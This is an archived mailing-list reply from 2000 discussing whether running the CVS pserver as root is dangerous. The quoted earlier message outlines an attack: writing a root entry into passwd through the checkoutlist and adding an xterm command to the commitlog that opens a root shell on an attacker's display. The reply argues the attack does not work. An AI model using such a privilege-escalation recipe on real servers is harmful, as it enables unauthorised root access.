[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: PServer authentication
From: |
Larry Jones |
Subject: |
Re: PServer authentication |
Date: |
Fri, 13 Oct 2000 11:15:27 -0400 (EDT) |
Martin Vogt writes:
>
> And as long as you dont run cvs as "root" from inetd.
> This is _very_ important, otherwise add passwd to the checkoutlist
> (when you have write access) add root:apasswd:root and add
> an xterm -display hackerHome:0 to the commitlog, voila: root shell.
When you run pserver as root, it only runs as root long enough to
vaildate the user and password, then it changes user to run as the user.
So the above only works if the user has write access to passwd, in which
case it would be a whole lot easier to login to the machine and edit it
directly instead of fooling around with CVS. Like I said, pserver
doesn't let you do anything that you couldn't do from a shell.
-Larry Jones
No one can prove I did that!! -- Calvin
- PServer authentication, Martin Foster, 2000/10/12
- Re: PServer authentication, Mike Castle, 2000/10/12
- Re: PServer authentication, Martin Foster, 2000/10/12
- Re: PServer authentication, Larry Jones, 2000/10/13
- Re: PServer authentication, Mike Castle, 2000/10/13
- Re: PServer authentication, Greg A. Woods, 2000/10/13
- Re: PServer authentication, Derek R. Price, 2000/10/17